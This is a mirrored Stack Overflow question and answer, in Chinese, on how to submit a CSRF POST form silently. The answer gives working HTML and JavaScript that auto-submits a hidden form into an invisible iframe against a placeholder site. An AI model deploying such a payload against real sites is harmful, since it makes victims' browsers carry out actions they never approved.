那些遇到过的问题

静默提交POST表单(CSRF)的示例

aps*_*nce 25 security csrf

我很想知道如何在没有任何通知的情况下静默提交CSRF的POST表单(文档位置被重定向到POSTed URL不是静默的).

例:

<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
Run Code Online (Sandbox Code Playgroud)

在外部站点上,我需要做什么才能自动且无声地触发此表单?

Gum*_*mbo 51

一种解决方案是在框架中打开表单的操作,如iframe:

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
Run Code Online (Sandbox Code Playgroud)

归档时间:

查看次数:

30163 次

最近记录:

7 年,6 月 前
相关归档
寻找在Ruby on Rails中构建安全REST API的建议 65
.NET中的身份验证,授权,用户和角色管理以及一般安全性 31
ID(来自mongo的ObjectIds)是否可以在URL中使用? 15
检查网址是否存在恶意软件或网上诱骗的服务? 8
使用openssl/makecert工具创建x509证书 5
保护内存中的凭证 5
这个登录系统安全吗? 4
电子邮件验证之后是否应该进行基于密码的登录?为什么? 3
如何在ruby on rails上提交后将注册页面重定向到哪里? 2
中间人可以拦截SSL数据包并复制吗? 2
难疑归档
为什么减去这两次(在1927年)给出一个奇怪的结果? 6628
在函数中使用全局变量 2939
使用'for'循环迭代字典 2901
Git拒绝合并关于rebase的无关历史 1862
什么是TypeScript,为什么我会用它代替JavaScript? 1637
我如何递归grep? 1619
如何为"选择"框创建占位符? 1426
为什么自闭脚本标签不起作用? 1284
如何使用INER JOIN与SQL Server删除? 1181
如何从JavaScript对象中删除密钥? 1171